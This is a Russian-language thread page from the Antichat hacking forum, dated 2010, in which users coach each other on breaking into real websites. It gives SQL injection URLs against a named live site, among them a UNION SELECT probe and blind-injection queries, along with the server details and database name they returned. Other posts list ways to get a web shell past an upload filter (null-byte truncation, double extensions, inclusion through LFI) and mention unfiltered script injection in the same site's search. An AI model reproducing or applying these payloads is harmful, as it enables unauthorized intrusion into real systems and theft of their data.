ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11911  
Старый 11.03.2010, 17:51
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от Bramin  
народ подскажите пжл, есть доступ в админку пытаюсь залить шелл через форму добовления банера, не разрешает. доступа к файлу ./htaccess нет

способов масса, большинство описаны на форуме.

обрезать нульбайтом, двойное расширение, загрузка файла как есть, с последующим инклюдом его (если LFI на сайте или серве) ну и некоторые другие способы
 
Ответить с цитированием

  #11912  
Старый 11.03.2010, 18:01
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Цитата:
Да,вывод видел,это слепая,да?Так как узнать уязвимое поле?(
Я в уязвимостях не очень шарю. Просто в этом случае смог подобрать количество полей.

Я другого не могу понять (вчера спрашивал, но здесь не могу все-равно). Почему не выводится инфа когда ввожу типа USER()? Пробовал так:
Код:
http://www.nwec.ru/index.php?issue_id=57+UNION+SELECT+1,2,3,4,USER(),6,7,8,9,10,11+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+1,1+--+
Что не так? И как сделать чтобы выводилось?
 
Ответить с цитированием

  #11913  
Старый 11.03.2010, 18:06
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
Сообщение от CyberHunter  
Я в уязвимостях не очень шарю. Просто в этом случае смог подобрать количество полей.

Я другого не могу понять (вчера спрашивал, но здесь не могу все-равно). Почему не выводится инфа когда ввожу типа USER()? Пробовал так:
Код:
http://www.nwec.ru/index.php?issue_id=57+UNION+SELECT+1,2,3,4,USER(),6,7,8,9,10,11+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+1,1+--+
Что не так? И как сделать чтобы выводилось?
а с чего ты взял, что поле №5 принтабельное? По мне там просто слепая инъекция, совсем слепая:
Код:
http://www.nwec.ru/index.php?issue_id=57+and+substring(version(),1,1)=5

@@basedir: /usr/
@@tmpdir: /tmp/
@@datadir: /data/
version(): 5.0.77-log
database(): db_cevzap_1
@@version_compile_os: unknown-linux-gnu
хотя может и не так)
 
Ответить с цитированием

  #11914  
Старый 11.03.2010, 18:06
Bramin
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199

Репутация: 127
Отправить сообщение для Bramin с помощью ICQ
По умолчанию

двойное расширение не катит, пробовал. обрезать нульбайтом у меня получается так shell.%00.php не загружается.
 
Ответить с цитированием

  #11915  
Старый 11.03.2010, 18:12
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Pashkela у меня так ничего не показывает. Скажи как найти принтабельное поле?
Подставлять вместо каждой цифры? И можно ли как-то вывести эти данные так как написал я?
 
Ответить с цитированием

  #11916  
Старый 11.03.2010, 18:14
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

CyberHunter, это слепая инъекция. Принтабельных полей тут нет, вывода, соответственно, тоже.
 
Ответить с цитированием

  #11917  
Старый 11.03.2010, 18:18
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Цитата:
CyberHunter, это слепая инъекция. Принтабельных полей тут нет, вывода, соответственно, тоже.
И что делать в таких случаях? Где можно об этом почитать?
 
Ответить с цитированием

  #11918  
Старый 11.03.2010, 18:52
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Дайте плз кто-нибудь ссылку на инфу о слепых инъекциях.
 
Ответить с цитированием

  #11919  
Старый 11.03.2010, 19:01
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию

Цитата:
Сообщение от CyberHunter  
Дайте плз кто-нибудь ссылку на инфу о слепых инъекциях.
https://forum.antichat.ru/showthread.php?t=119047
 
Ответить с цитированием

  #11920  
Старый 11.03.2010, 20:06
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию

Цитата:
Сообщение от MastaBass1  
Тоесть сайт не нагнуть, зато поиск не фильтрует <> и скрипты спокойно выполняются)(Может и не в тему написал)=))
Цитата:
http://www.nwec.ru/index.php?issue_id=57 AND Length((SELECT albums.id FROM db_cevzap_1.albums LIMIT 0,1))<32
..

Последний раз редактировалось [Feldmarschall]; 11.03.2010 в 20:09..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ